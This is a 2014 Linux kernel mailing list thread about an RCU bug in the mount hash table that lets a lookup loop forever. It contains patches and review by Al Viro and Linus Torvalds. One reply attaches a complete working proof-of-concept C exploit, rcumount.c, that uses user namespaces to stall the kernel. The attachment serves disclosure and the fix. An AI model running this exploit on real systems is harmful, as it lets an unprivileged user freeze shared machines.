* [PATCH 1/2] fs/namespace: don't clobber mnt_hash.next while umounting
@ 2014-03-19 21:22 Max Kellermann
From: Max Kellermann @ 2014-03-19 21:22 UTC (permalink / raw)
To: viro; +Cc: max, linux-kernel
mount.mnt_hash is RCU-protected. However, list_move() breaks RCU
protection: when one thread walks the linked list while another calls
list_move(), it may "redirect" the first thread into the new list,
making it loop endlessly in __lookup_mnt(), because the list head is
never found.
The right way to delete items from an RCU-protected list is
list_del_rcu(). Before the item is inserted into another list
(completing the list_move()), synchronize_rcu() must be called.
umount_tree() has code to implement this kind of protection; it moves
the "mount" object to the global list "unmounted", to be cleaned up by
namespace_unlock() after a synchronize_rcu() call. This however did
not work because umount_tree() reused the "mnt_hash" attribute for the
"unmounted" list.
In the presence of user+mount namespaces, this bug can be exploited by
any unprivileged user to stall the kernel (denial of service by soft
lockup).
The fix is to avoid reusing "mnt_hash". This patch adds a new
list_head attribute dedicated to umounting. This avoids clobbering
mnt_hash.next, allowing all RCU-locked threads to continue walking the
list until namespace_unlock() is called.
This regression was caused by commit 48a066e7 ("RCU'd vfsmounts").
All releases since 3.12-rc5 are affected.
Signed-off-by: Max Kellermann <mk@cm4all.com>
---
fs/mount.h | 1 +
fs/namespace.c | 12 +++++++-----
fs/pnode.c | 8 +++++---
3 files changed, 13 insertions(+), 8 deletions(-)
diff --git a/fs/mount.h b/fs/mount.h
index a17458c..9cfdf94 100644
--- a/fs/mount.h
+++ b/fs/mount.h
@@ -36,6 +36,7 @@ struct mount {
int mnt_count;
int mnt_writers;
#endif
+ struct list_head mnt_unmounted; /* list of mounts being unmounted */
struct list_head mnt_mounts; /* list of children, anchored here */
struct list_head mnt_child; /* and going through their mnt_child */
struct list_head mnt_instance; /* mount instance on sb->s_mounts */
diff --git a/fs/namespace.c b/fs/namespace.c
index 338ccc2..2aa0a14 100644
--- a/fs/namespace.c
+++ b/fs/namespace.c
@@ -1171,8 +1171,8 @@ static void namespace_unlock(void)
synchronize_rcu();
while (!list_empty(&head)) {
- mnt = list_first_entry(&head, struct mount, mnt_hash);
- list_del_init(&mnt->mnt_hash);
+ mnt = list_first_entry(&head, struct mount, mnt_unmounted);
+ list_del_init(&mnt->mnt_unmounted);
if (mnt->mnt_ex_mountpoint.mnt)
path_put(&mnt->mnt_ex_mountpoint);
mntput(&mnt->mnt);
@@ -1196,13 +1196,15 @@ void umount_tree(struct mount *mnt, int how)
LIST_HEAD(tmp_list);
struct mount *p;
- for (p = mnt; p; p = next_mnt(p, mnt))
- list_move(&p->mnt_hash, &tmp_list);
+ for (p = mnt; p; p = next_mnt(p, mnt)) {
+ list_del_rcu(&p->mnt_hash);
+ list_add(&p->mnt_unmounted, &tmp_list);
+ }
if (how)
propagate_umount(&tmp_list);
- list_for_each_entry(p, &tmp_list, mnt_hash) {
+ list_for_each_entry(p, &tmp_list, mnt_unmounted) {
list_del_init(&p->mnt_expire);
list_del_init(&p->mnt_list);
__touch_mnt_namespace(p->mnt_ns);
diff --git a/fs/pnode.c b/fs/pnode.c
index c7221bb..4bca573 100644
--- a/fs/pnode.c
+++ b/fs/pnode.c
@@ -338,8 +338,10 @@ static void __propagate_umount(struct mount *mnt)
* umount the child only if the child has no
* other children
*/
- if (child && list_empty(&child->mnt_mounts))
- list_move_tail(&child->mnt_hash, &mnt->mnt_hash);
+ if (child && list_empty(&child->mnt_mounts)) {
+ list_del_rcu(&child->mnt_hash);
+ list_add(&child->mnt_unmounted, &mnt->mnt_hash);
+ }
}
}
@@ -354,7 +356,7 @@ int propagate_umount(struct list_head *list)
{
struct mount *mnt;
- list_for_each_entry(mnt, list, mnt_hash)
+ list_for_each_entry(mnt, list, mnt_unmounted)
__propagate_umount(mnt);
return 0;
}
* [PATCH 2/2] fs/namespace: use RCU list functions for mnt_hash
@ 2014-03-19 21:22 ` Max Kellermann
From: Max Kellermann @ 2014-03-19 21:22 UTC (permalink / raw)
To: viro; +Cc: max, linux-kernel
mount.mnt_hash is RCU-protected, and therefore we must use the RCU
variants to manipulate the list.
Signed-off-by: Max Kellermann <mk@cm4all.com>
---
fs/namespace.c | 9 +++++----
1 file changed, 5 insertions(+), 4 deletions(-)
diff --git a/fs/namespace.c b/fs/namespace.c
index 2aa0a14..295a0c0 100644
--- a/fs/namespace.c
+++ b/fs/namespace.c
@@ -22,6 +22,7 @@
#include <linux/fsnotify.h> /* fsnotify_vfsmount_delete */
#include <linux/uaccess.h>
#include <linux/proc_ns.h>
+#include <linux/rculist.h>
#include <linux/magic.h>
#include "pnode.h"
#include "internal.h"
@@ -739,8 +740,8 @@ static void attach_mnt(struct mount *mnt,
struct mountpoint *mp)
{
mnt_set_mountpoint(parent, mp, mnt);
- list_add_tail(&mnt->mnt_hash, mount_hashtable +
- hash(&parent->mnt, mp->m_dentry));
+ list_add_tail_rcu(&mnt->mnt_hash, mount_hashtable +
+ hash(&parent->mnt, mp->m_dentry));
list_add_tail(&mnt->mnt_child, &parent->mnt_mounts);
}
@@ -762,8 +763,8 @@ static void commit_tree(struct mount *mnt)
list_splice(&head, n->list.prev);
- list_add_tail(&mnt->mnt_hash, mount_hashtable +
- hash(&parent->mnt, mnt->mnt_mountpoint));
+ list_add_tail_rcu(&mnt->mnt_hash, mount_hashtable +
+ hash(&parent->mnt, mnt->mnt_mountpoint));
list_add_tail(&mnt->mnt_child, &parent->mnt_mounts);
touch_mnt_namespace(n);
}
* Re: [PATCH 1/2] fs/namespace: don't clobber mnt_hash.next while umounting
@ 2014-03-19 21:24 ` Max Kellermann
From: Max Kellermann @ 2014-03-19 21:24 UTC (permalink / raw)
To: viro, linux-kernel
[-- Attachment #1: Type: text/plain, Size: 250 bytes --]
On 2014/03/19 22:22, Max Kellermann <mk@cm4all.com> wrote:
> In the presence of user+mount namespaces, this bug can be exploited by
> any unprivileged user to stall the kernel (denial of service by soft
> lockup).
Proof-of-concept exploit attached.
[-- Attachment #2: rcumount.c --]
[-- Type: text/x-csrc, Size: 1878 bytes --]
/*
* Exploit for linux commit 48a066e72d970a3e225a9c18690d570c736fc455:
* endless loop in __lookup_mnt() because the mount_hashtable does not
* have enough RCU protection.
*
* How to use:
*
* gcc -D_GNU_SOURCE -std=gnu99 -o rcumount rcumount.c && ./rcumount
*
* Wait a few minutes until "rcu_sched self-detected stall" appears.
* The machine is now unusable.
*
* Author: Max Kellermann <max@duempel.org>
*/
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>	/* SIGCHLD for clone() */
#include <sys/wait.h>
#include <sched.h>
#include <sys/mount.h>
#include <sys/stat.h>

static void stress(void)
{
	/* make all mounts private so our namespace "owns" them */
	mount(NULL, "/", NULL, MS_PRIVATE|MS_REC, NULL);

	while (1) {
		/* stress the mount_hashtable, which will at some point
		   modify a list_head that is rcu-protected but still
		   referenced by another kernel thread; this may or may
		   not send that other kernel thread into an endless loop
		   inside __lookup_mnt(), where it never sees the list
		   head again */
		if (mount("none", "/tmp", "tmpfs", 0,
			  "size=16M,nr_inodes=256") == 0)
			umount2("/tmp", MNT_DETACH);

		/* ask the kernel to walk the mount hash, which may
		   trigger the __lookup_mnt() loop */
		struct stat st;
		stat("/tmp/..", &st);
	}
}

static int fn(void *arg)
{
	(void)arg;

	/* launch child processes */
	for (unsigned i = 0; i < 32; ++i) {
		if (fork() == 0) {
			stress();
			exit(0);
		}
	}

	/* cleanup */
	int status;
	do {} while (wait(&status) > 0);
	return 0;
}

int main(int argc, char **argv)
{
	(void)argc;
	(void)argv;

	/* create a new user+vfs namespace which allows us to mount() */
	char stack[65536];
	clone(fn, stack + sizeof(stack),
	      SIGCHLD|CLONE_NEWNS|CLONE_NEWUSER, NULL);

	/* cleanup */
	int status;
	wait(&status);
	return 0;
}
* Re: [PATCH 1/2] fs/namespace: don't clobber mnt_hash.next while umounting
@ 2014-03-19 21:37 ` Max Kellermann
From: Max Kellermann @ 2014-03-19 21:37 UTC (permalink / raw)
To: viro; +Cc: linux-kernel
On 2014/03/19 22:22, Max Kellermann <mk@cm4all.com> wrote:
> + list_add(&child->mnt_unmounted, &mnt->mnt_hash);
This is obviously a bug in my patch, sorry. Will resend a fixed
patch.
* [PATCH] fs/namespace: don't clobber mnt_hash.next while umounting [v2]
@ 2014-03-19 21:39 ` Max Kellermann
From: Max Kellermann @ 2014-03-19 21:39 UTC (permalink / raw)
To: viro; +Cc: max, linux-kernel
mount.mnt_hash is RCU-protected. However, list_move() breaks RCU
protection: when one thread walks the linked list while another calls
list_move(), it may "redirect" the first thread into the new list,
making it loop endlessly in __lookup_mnt(), because the list head is
never found.
The right way to delete items from an RCU-protected list is
list_del_rcu(). Before the item is inserted into another list
(completing the list_move()), synchronize_rcu() must be called.
umount_tree() has code to implement this kind of protection; it moves
the "mount" object to the global list "unmounted", to be cleaned up by
namespace_unlock() after a synchronize_rcu() call. This however did
not work because umount_tree() reused the "mnt_hash" attribute for the
"unmounted" list.
In the presence of user+mount namespaces, this bug can be exploited by
any unprivileged user to stall the kernel (denial of service by soft
lockup).
The fix is to avoid reusing "mnt_hash". This patch adds a new
list_head attribute dedicated to umounting. This avoids clobbering
mnt_hash.next, allowing all RCU-locked threads to continue walking the
list until namespace_unlock() is called.
This regression was caused by commit 48a066e7 ("RCU'd vfsmounts").
All releases since 3.12-rc5 are affected.
Signed-off-by: Max Kellermann <mk@cm4all.com>
---
fs/mount.h | 1 +
fs/namespace.c | 12 +++++++-----
fs/pnode.c | 8 +++++---
3 files changed, 13 insertions(+), 8 deletions(-)
diff --git a/fs/mount.h b/fs/mount.h
index a17458c..9cfdf94 100644
--- a/fs/mount.h
+++ b/fs/mount.h
@@ -36,6 +36,7 @@ struct mount {
int mnt_count;
int mnt_writers;
#endif
+ struct list_head mnt_unmounted; /* list of mounts being unmounted */
struct list_head mnt_mounts; /* list of children, anchored here */
struct list_head mnt_child; /* and going through their mnt_child */
struct list_head mnt_instance; /* mount instance on sb->s_mounts */
diff --git a/fs/namespace.c b/fs/namespace.c
index 338ccc2..2aa0a14 100644
--- a/fs/namespace.c
+++ b/fs/namespace.c
@@ -1171,8 +1171,8 @@ static void namespace_unlock(void)
synchronize_rcu();
while (!list_empty(&head)) {
- mnt = list_first_entry(&head, struct mount, mnt_hash);
- list_del_init(&mnt->mnt_hash);
+ mnt = list_first_entry(&head, struct mount, mnt_unmounted);
+ list_del_init(&mnt->mnt_unmounted);
if (mnt->mnt_ex_mountpoint.mnt)
path_put(&mnt->mnt_ex_mountpoint);
mntput(&mnt->mnt);
@@ -1196,13 +1196,15 @@ void umount_tree(struct mount *mnt, int how)
LIST_HEAD(tmp_list);
struct mount *p;
- for (p = mnt; p; p = next_mnt(p, mnt))
- list_move(&p->mnt_hash, &tmp_list);
+ for (p = mnt; p; p = next_mnt(p, mnt)) {
+ list_del_rcu(&p->mnt_hash);
+ list_add(&p->mnt_unmounted, &tmp_list);
+ }
if (how)
propagate_umount(&tmp_list);
- list_for_each_entry(p, &tmp_list, mnt_hash) {
+ list_for_each_entry(p, &tmp_list, mnt_unmounted) {
list_del_init(&p->mnt_expire);
list_del_init(&p->mnt_list);
__touch_mnt_namespace(p->mnt_ns);
diff --git a/fs/pnode.c b/fs/pnode.c
index c7221bb..c16c5d64 100644
--- a/fs/pnode.c
+++ b/fs/pnode.c
@@ -338,8 +338,10 @@ static void __propagate_umount(struct mount *mnt)
* umount the child only if the child has no
* other children
*/
- if (child && list_empty(&child->mnt_mounts))
- list_move_tail(&child->mnt_hash, &mnt->mnt_hash);
+ if (child && list_empty(&child->mnt_mounts)) {
+ list_del_rcu(&child->mnt_hash);
+ list_add(&child->mnt_unmounted, &mnt->mnt_unmounted);
+ }
}
}
@@ -354,7 +356,7 @@ int propagate_umount(struct list_head *list)
{
struct mount *mnt;
- list_for_each_entry(mnt, list, mnt_hash)
+ list_for_each_entry(mnt, list, mnt_unmounted)
__propagate_umount(mnt);
return 0;
}
* Re: [PATCH] fs/namespace: don't clobber mnt_hash.next while umounting [v2]
@ 2014-03-20 3:48 ` Al Viro
From: Al Viro @ 2014-03-20 3:48 UTC (permalink / raw)
To: Max Kellermann; +Cc: max, linux-kernel, Linus Torvalds
On Wed, Mar 19, 2014 at 10:39:45PM +0100, Max Kellermann wrote:
> mount.mnt_hash is RCU-protected. However, list_move() breaks RCU
> protection: when one thread walks the linked list while another calls
> list_move(), it may "redirect" the first thread into the new list,
> making it loop endlessly in __lookup_mnt(), because the list head is
> never found.
> The right way to delete items from a RCU-protected list is
> list_del_rcu(). Before the item is inserted into another list
> (completing the list_move), synchronize_rcu() must be called.
> The fix is to avoid reusing "mnt_hash". This patch adds a new
> list_head attribute dedicated for umounting. This avoids clobbering
> mnt_hash.next, allowing all rcu_locked threads to continue walk the
> list until namespace_unlock() is called.
NAK. Nice catch, the bug is real, but the fix is wrong. For one thing,
you have missed detach_mnt()/attach_mnt(), so you are not covering
all places where the sucker might be removed from the list. For another,
I don't believe that this is the right approach.
The *only* thing we care about is not getting stuck in __lookup_mnt(). If
it misses an entry because something in front of it just got moved around,
etc., we are fine. We'll notice the mount_lock mismatch and that'll be
it.
IOW, there are two problems here:
(1) we can, indeed, get caught into an infinite loop.
(2) __follow_mount_rcu() and follow_mount_rcu() ought to recheck
nd->m_seq and bugger off with ECHILD in case of mismatch (the latter probably
ought to be folded into follow_dotdot_rcu()). legitimize_mnt() will fail
in the end of lookup *and* we are risking an incorrect hard error if we fail
to cross a mountpoint and continue under it.
I would prefer to deal with (1) by turning mnt_hash into hlist; the problem
with that is __lookup_mnt_last(). That sucker is only called under
mount_lock, so RCU issues do not play there, but it's there and it
complicates things. There might be a way to get rid of that thing for
good, but that's more invasive than what I'd be happy with for backports.
Let's just have __lookup_mnt() recheck mount_lock if it goes for too long -
e.g. every 256 iterations (and if the hash chain is that long, the price
of extra smp_rmb() + fetching seqcount won't matter anyway). And have the
fs/namei.c callers check nd->m_seq properly (lookup_mnt() already does).
I've looked into taking the check into __lookup_mnt() itself, but it
leads to clumsier calling conventions and worse code in callers.
How about the following (completely untested yet):
diff --git a/fs/mount.h b/fs/mount.h
index 46790ae1..905d1bc 100644
--- a/fs/mount.h
+++ b/fs/mount.h
@@ -77,7 +77,7 @@ static inline int is_mounted(struct vfsmount *mnt)
return !IS_ERR_OR_NULL(real_mount(mnt)->mnt_ns);
}
-extern struct mount *__lookup_mnt(struct vfsmount *, struct dentry *);
+extern struct mount *__lookup_mnt(struct vfsmount *, struct dentry *, unsigned seq);
extern struct mount *__lookup_mnt_last(struct vfsmount *, struct dentry *);
extern bool legitimize_mnt(struct vfsmount *, unsigned);
diff --git a/fs/namei.c b/fs/namei.c
index d6e32a1..458572b 100644
--- a/fs/namei.c
+++ b/fs/namei.c
@@ -1115,7 +1115,7 @@ static bool __follow_mount_rcu(struct nameidata *nd, struct path *path,
if (!d_mountpoint(path->dentry))
break;
- mounted = __lookup_mnt(path->mnt, path->dentry);
+ mounted = __lookup_mnt(path->mnt, path->dentry, nd->m_seq);
if (!mounted)
break;
path->mnt = &mounted->mnt;
@@ -1129,20 +1129,7 @@ static bool __follow_mount_rcu(struct nameidata *nd, struct path *path,
*/
*inode = path->dentry->d_inode;
}
- return true;
-}
-
-static void follow_mount_rcu(struct nameidata *nd)
-{
- while (d_mountpoint(nd->path.dentry)) {
- struct mount *mounted;
- mounted = __lookup_mnt(nd->path.mnt, nd->path.dentry);
- if (!mounted)
- break;
- nd->path.mnt = &mounted->mnt;
- nd->path.dentry = mounted->mnt.mnt_root;
- nd->seq = read_seqcount_begin(&nd->path.dentry->d_seq);
- }
+ return !read_seqretry(&mount_lock, nd->m_seq);
}
static int follow_dotdot_rcu(struct nameidata *nd)
@@ -1170,7 +1157,17 @@ static int follow_dotdot_rcu(struct nameidata *nd)
break;
nd->seq = read_seqcount_begin(&nd->path.dentry->d_seq);
}
- follow_mount_rcu(nd);
+ while (d_mountpoint(nd->path.dentry)) {
+ struct mount *mounted;
+ mounted = __lookup_mnt(nd->path.mnt, nd->path.dentry, nd->m_seq);
+ if (!mounted)
+ break;
+ nd->path.mnt = &mounted->mnt;
+ nd->path.dentry = mounted->mnt.mnt_root;
+ nd->seq = read_seqcount_begin(&nd->path.dentry->d_seq);
+ if (read_seqretry(&mount_lock, nd->m_seq))
+ goto failed;
+ }
nd->inode = nd->path.dentry->d_inode;
return 0;
diff --git a/fs/namespace.c b/fs/namespace.c
index 203475b..72c20b0 100644
--- a/fs/namespace.c
+++ b/fs/namespace.c
@@ -599,16 +599,23 @@ bool legitimize_mnt(struct vfsmount *bastard, unsigned seq)
/*
* find the first mount at @dentry on vfsmount @mnt.
- * call under rcu_read_lock()
+ * call under rcu_read_lock(). seq is normally *not* checked - that's
+ * for the caller to deal with; here we are just breaking infinite loops.
+ * If we get hash chains longer than 256 elements, the price of extra
+ * smp_rmb() won't matter.
*/
-struct mount *__lookup_mnt(struct vfsmount *mnt, struct dentry *dentry)
+struct mount *__lookup_mnt(struct vfsmount *mnt, struct dentry *dentry, unsigned seq)
{
struct list_head *head = m_hash(mnt, dentry);
struct mount *p;
+ unsigned char n = 0;
- list_for_each_entry_rcu(p, head, mnt_hash)
+ list_for_each_entry_rcu(p, head, mnt_hash) {
+ if (unlikely(!--n) && read_seqretry(&mount_lock, seq))
+ break;
if (&p->mnt_parent->mnt == mnt && p->mnt_mountpoint == dentry)
return p;
+ }
return NULL;
}
@@ -652,7 +659,7 @@ struct vfsmount *lookup_mnt(struct path *path)
rcu_read_lock();
do {
seq = read_seqbegin(&mount_lock);
- child_mnt = __lookup_mnt(path->mnt, path->dentry);
+ child_mnt = __lookup_mnt(path->mnt, path->dentry, seq);
m = child_mnt ? &child_mnt->mnt : NULL;
} while (!legitimize_mnt(m, seq));
rcu_read_unlock();
* Re: [PATCH] fs/namespace: don't clobber mnt_hash.next while umounting [v2]
@ 2014-03-20 4:02 ` Linus Torvalds
From: Linus Torvalds @ 2014-03-20 4:02 UTC (permalink / raw)
To: Al Viro; +Cc: Max Kellermann, max, Linux Kernel Mailing List
On Wed, Mar 19, 2014 at 8:48 PM, Al Viro <viro@zeniv.linux.org.uk> wrote:
>
> NAK. Nice catch, the bug is real, but the fix is wrong. For one thing,
> you have missed detach_mnt()/attach_mnt(), so you are not covering
> all places where the sucker might be removed from the list. For another,
> I don't believe that this is the right approach.
>
> The *only* thing we care about is not getting stuck in __lookup_mnt().
Quite frankly, if that's the main issue, then may I suggest aiming to
use a 'hlist' instead of a doubly-linked list? Those have the
advantage that they are NULL-terminated.
Yeah, hlists have some disadvantages too, which might not make them
work in this case, but really, for mnt_hash? hlists are generally
*exactly* what you want for hash lists, because the head is smaller.
And because of the NULL termination rather than having the head used
in the middle of a circular list, you don't get the termination
problems when moving entries across chains.
I did not look whether there was some reason a hlist isn't appropriate
here. Maybe you can tell me. Or go "yeah, a hlist would work nicely".
Linus
* Re: [PATCH] fs/namespace: don't clobber mnt_hash.next while umounting [v2]
@ 2014-03-20 4:21 ` Al Viro
From: Al Viro @ 2014-03-20 4:21 UTC (permalink / raw)
To: Linus Torvalds; +Cc: Max Kellermann, max, Linux Kernel Mailing List
On Wed, Mar 19, 2014 at 09:02:33PM -0700, Linus Torvalds wrote:
> Quite frankly, if that's the main issue, then may I suggest aiming to
> use a 'hlist' instead of a doubly-linked list? Those have the
> advantage that they are NULL-terminated.
>
> Yeah, hlists have some disadvantages too, which might not make them
> work in this case, but really, for mnt_hash? hlists are generally
> *exactly* what you want for hash lists, because the head is smaller.
> And because of the NULL termination rather than having the head used
> in the middle of a circular list, you don't get the termination
> problems when moving entries across chains.
>
> I did not look whether there was some reason a hlist isn't appropriate
> here. Maybe you can tell me.
Er... I have, actually, right in the part you've snipped ;-)
<unsnip>
I would prefer to deal with (1) by turning mnt_hash into hlist; the problem
with that is __lookup_mnt_last(). That sucker is only called under
mount_lock, so RCU issues do not play there, but it's there and it
complicates things. There might be a way to get rid of that thing for
good, but that's more invasive than what I'd be happy with for backports.
</unsnip>
hlist _is_ better, no questions there, but surgery required to deal with
__lookup_mnt_last()[1] is too invasive for backports and even more so -
for -final. I would prefer to have the merge window happen after LSF/MM,
obviously, but I thought you wanted to open it this Sunday?
[1] that is, with cases like "/tmp/b is a slave of /tmp/a, bind foo on
/tmp/b/c, then bind bar on /tmp/a/c, then umount /tmp/a/c". The only
kinda-sorta sane semantics we'd been able to come up with is what
we do right now and that's where __lookup_mnt_last() has come from.
* Re: [PATCH] fs/namespace: don't clobber mnt_hash.next while umounting [v2]
@ 2014-03-20 4:58 ` Linus Torvalds
From: Linus Torvalds @ 2014-03-20 4:58 UTC (permalink / raw)
To: Al Viro; +Cc: Max Kellermann, max, Linux Kernel Mailing List
On Wed, Mar 19, 2014 at 9:21 PM, Al Viro <viro@zeniv.linux.org.uk> wrote:
>
> Er... I have, actually, right in the part you've snipped ;-)
Heh. That's what I get for just reading the patch, and skimming the explanation.
> I would prefer to deal with (1) by turning mnt_hash into hlist; the problem
> with that is __lookup_mnt_last(). That sucker is only called under
> mount_lock, so RCU issues do not play there, but it's there and it
> complicates things. There might be a way to get rid of that thing for
> good, but that's more invasive than what I'd be happy with for backports.
Yeah. I see what you're saying. That said, if we expect the mnt_hash
queues to be short (and they really should be), that whole
__lookup_mnt_last() could just be
	struct mount *p, *result = NULL;

	hlist_for_each_entry(p, head, mnt_hash)
		if (&p->mnt_parent->mnt == mnt && p->mnt_mountpoint == dentry)
			result = p;
	return result;
which is certainly simple.
Sure, it always walks the whole list, but as far as I can tell the
callers aren't exactly performance-critical, and we're talking about a
hlist that should be just a couple of entries in size..
So if that's the _only_ thing holding back using hlists, I'd say we
should just do the above trivial conversion.
Linus